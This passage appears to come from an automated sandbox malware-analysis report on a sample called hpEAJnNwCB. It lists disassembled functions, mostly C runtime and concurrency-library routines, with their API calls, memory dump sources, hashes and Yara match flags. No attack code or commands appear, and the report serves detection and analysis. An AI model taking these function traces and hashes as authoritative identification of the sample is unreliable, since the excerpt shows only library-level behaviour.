                                                                                                                                                                                                                                              • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                            • String ID: pContext$switchState
                                                                                                                                                                                                                                            • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                                            • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                            • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                                                                                                                                                            Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                                                                                                                                                            • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                                                                                                                                                              • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                                                                                                                                                              • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004197B9
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: eventObject
                                                                                                                                                                                                                                            • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                            • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                            • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                                                                                                                                                            Function 024B0C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 024B0C36
                                                                                                                                                                                                                                            • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024B0C9D
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024B0CBA
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024B0D20
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024B0D35
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024B0D47
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024B0D75
                                                                                                                                                                                                                                            • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024B0D80
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024B0DAC
                                                                                                                                                                                                                                            • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024B0DBC
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3720063390-0
                                                                                                                                                                                                                                            • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                            • Instruction ID: 786d573ca87ffe611f688709f5500a60eecc739d42592a39fd8531b607247f3d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6741B330A042449BCF1AFFA5C4A47EE7BA6AF15305F0450AFD8095B3C2DB659A0ACF71
                                                                                                                                                                                                                                            Function 024C204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C2061
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C206D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C2078
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C2083
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C208E
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C2099
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C20A4
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C20AF
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C20BA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C20C8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                            • Instruction ID: 0f68bc051604a93f9ce8e542ecc60d661016fa722728ebdc5245b7f71ea2c3c4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09114779710108AFCB91FF5AC941DD93FA6EF04750B6181AABA094F261D771EE609F80
                                                                                                                                                                                                                                            Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431DFA
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431E06
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431E11
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431E1C
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431E27
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431E32
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431E3D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431E48
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431E53
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431E61
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                            • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                                                                                                                                                            Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __cftoe
                                                                                                                                                                                                                                            • String ID: F(@$F(@
                                                                                                                                                                                                                                            • API String ID: 4189289331-2038261262
                                                                                                                                                                                                                                            • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                            • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                                                                                                                                                                                                            Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DecodePointer
                                                                                                                                                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                            • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                            • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                            • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                                                                                                                                                                                            Function 024C3190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                            • Instruction ID: c01345a6aba6f99cc68671fc9a445fcd6e03ffdfd8eb45b103531f9227e7a0b5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54C1E278E04245ABCB52DFADC840BEEBFB5AF09304F6481DEE814AB391C7709941CB65
                                                                                                                                                                                                                                            Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                            • String ID: fB$csm
                                                                                                                                                                                                                                            • API String ID: 1170836740-1586063737
                                                                                                                                                                                                                                            • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                            • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                                                                                                                                                                                            Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                                                                                                                                                                                                            • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                                                                                                                                                                                                            • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                                                                                                                                                                                                            • PMDtoOffset.LIBCMT ref: 00428D4F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                            • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                            • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                            • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                            • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                                                                                                                                                                                            Function 024AC6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • atomic_compare_exchange.LIBCONCRT ref: 024AC6DC
                                                                                                                                                                                                                                            • atomic_compare_exchange.LIBCONCRT ref: 024AC700
                                                                                                                                                                                                                                            • std::_Cnd_initX.LIBCPMT ref: 024AC711
                                                                                                                                                                                                                                            • std::_Cnd_initX.LIBCPMT ref: 024AC71F
                                                                                                                                                                                                                                              • Part of subcall function 02491370: __Mtx_unlock.LIBCPMT ref: 02491377
                                                                                                                                                                                                                                            • std::_Cnd_initX.LIBCPMT ref: 024AC72F
                                                                                                                                                                                                                                              • Part of subcall function 024AC3EF: __Cnd_broadcast.LIBCPMT ref: 024AC3F6
                                                                                                                                                                                                                                            • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024AC73D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                                            • String ID: t#D
                                                                                                                                                                                                                                            • API String ID: 4258476935-1671555958
                                                                                                                                                                                                                                            • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                            • Instruction ID: a540ffa58f75eb57f18687293ca5bbf1f46a396b577690c6308ad402697d5fd8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C01F775900605A7DF11B762CD95B9EB76ABF10310F14001BE80997780DBB4AA158FD2
                                                                                                                                                                                                                                            Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 0043231B
                                                                                                                                                                                                                                              • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00432324
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00432349
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3864826663-0
                                                                                                                                                                                                                                            • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                            • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                                                                                                                                                            Function 024C1129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C1444
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C145D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C148F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C1498
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C14A4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorLast
                                                                                                                                                                                                                                            • String ID: C
                                                                                                                                                                                                                                            • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                            • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                            • Instruction ID: 0174e17bd8256397e2bb95e95aa0b9571352f9f89f873a19963941fa4aa1829d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14B12679A012199BDB65DF18C884BAEB7B5FB48304F2085AED84DA7351D770AE90CF80
                                                                                                                                                                                                                                            Function 024CA115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                            • Instruction ID: 5951c86e5e6e204d0ee8af657f033095aff449d5c3a18a4a25b5e6a03ac25a25
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB61E179A00229AFDBA0DF6DC841B9ABBF5EB44710F3441AFE844EB345D771A941CB90
                                                                                                                                                                                                                                            Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                            • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
